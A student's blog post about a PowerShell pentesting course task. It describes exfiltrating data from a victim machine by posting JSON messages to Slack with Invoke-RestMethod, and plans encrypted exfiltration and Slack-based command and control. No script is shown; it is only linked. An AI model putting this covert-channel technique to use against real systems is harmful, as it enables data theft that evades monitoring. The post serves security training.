Exfiltrate to Slack - PowerShell for Pentesters (PSSE)
Welcome Back! This is the 8th task in the PowerShell for Pentesters course, offered by Security Tube! For this task we were required to ship up data from a victim machine and post it to 3rd party site in an effort to get the data out of the target environment. I had difficulty with this script originally because most sites required the file upload to be submitted via a 'multipart/form-data' post, via a REST API, which I had errors with when attempting to call the Invoke-RestMethod. Therefore, on the Slack platform I used the PowerShell Invoke-RestMethod to send a JSON body with my message encoded in there. I can then have other bots consume and decode these messages, so I don't have to go through the traditional Upload File endpoint, but this will be nice to implement in the future for human users. That said, I also plan to compress and encrypt the file exfiltration data, making it more readily digestible by other bots, who can decrypt and store it safely outside the target environment. Finally, the benefits of using a known / good service like Slack for covert channels is innumerable, and certainly a theme I will be revisiting with the next task, turning one of the channels into a full command and control protocol. You can find the Exfil-To-Slack script here, as part of the PSSE repository. In the following screenshot you can see the bot in action.
This script has been created for completing the requirements of the SecurityTube PowerShell for Penetration Testers Certification Exam
Student ID: PSP-3061